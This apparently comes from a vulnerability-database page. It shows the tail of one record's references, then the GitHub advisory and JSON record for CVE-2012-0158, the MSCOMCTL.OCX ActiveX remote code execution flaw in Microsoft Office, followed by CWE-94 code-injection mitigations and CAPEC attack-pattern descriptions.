      "type": "WEB",
      "url": "http://secunia.com/advisories/31521"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/4178"
    },
    {
      "type": "WEB",
      "url": "http://www.gulftech.org/?node=research\u0026article_id=00124-08162008"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/495542/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/30729"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XC3W-WQX5-QRF9

Vulnerability from github – Published: 2022-05-04 00:28 – Updated: 2025-10-22 03:30
VLAI
Details

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-0158"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2012-04-10T21:55:00Z",
    "severity": "HIGH"
  },
  "details": "The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers \"system state\" corruption, as exploited in the wild in April 2012, aka \"MSCOMCTL.OCX RCE Vulnerability.\"",
  "id": "GHSA-xc3w-wqx5-qrf9",
  "modified": "2025-10-22T03:30:30Z",
  "published": "2022-05-04T00:28:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0158"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74372"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15462"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2012-0158"
    },
    {
      "type": "WEB",
      "url": "http://opensources.info/comment-on-the-curious-case-of-a-cve-2012-0158-exploit-by-chris-pierce"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/52911"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1026899"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1026900"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1026902"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1026903"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1026904"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1026905"
    },
    {
      "type": "WEB",
      "url": "http://www.us-cert.gov/cas/techalerts/TA12-101A.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.